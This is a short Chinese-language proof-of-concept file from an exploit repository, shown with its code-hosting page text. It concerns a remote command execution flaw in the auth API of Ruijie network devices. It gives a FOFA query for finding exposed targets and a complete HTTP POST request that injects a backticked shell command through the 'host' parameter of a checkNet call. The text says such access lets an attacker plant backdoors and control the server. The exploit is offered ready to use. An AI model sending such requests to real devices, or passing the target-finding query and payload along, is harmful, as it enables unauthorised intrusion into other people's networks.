POC/wpoc/锐捷/锐捷系统接口auth存在远程命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

26 lines
896 B
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 锐捷系统接口auth存在远程命令执行漏洞
锐捷睿易是锐捷网络面向商务市场的子品牌。拥有便捷的网络、交换机、路由器、无线、安全、云服务六大产品线解决方案涵盖商业零售、酒店、kt、网吧、监控与安全、物流、仓储、制造。通过该漏洞攻击者可以任意执行服务器端的代码编写后门获得服务器权限进而控制整个web服务器。
## fofa
```javascript
body="cgi-bin/luci" && body="#f47f3e"
```
## poc
```javascript
POST /cgi-bin/luci/api/auth HTTP/1.1
Host: 
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{"method":"checkNet","params":{"host":"`echo c149136B>AD0D5b8c.txt`"}}
```
## 漏洞来源
- https://mp.weixin.qq.com/s/Vh64WEnrIDBBsZ6EuJqx4Q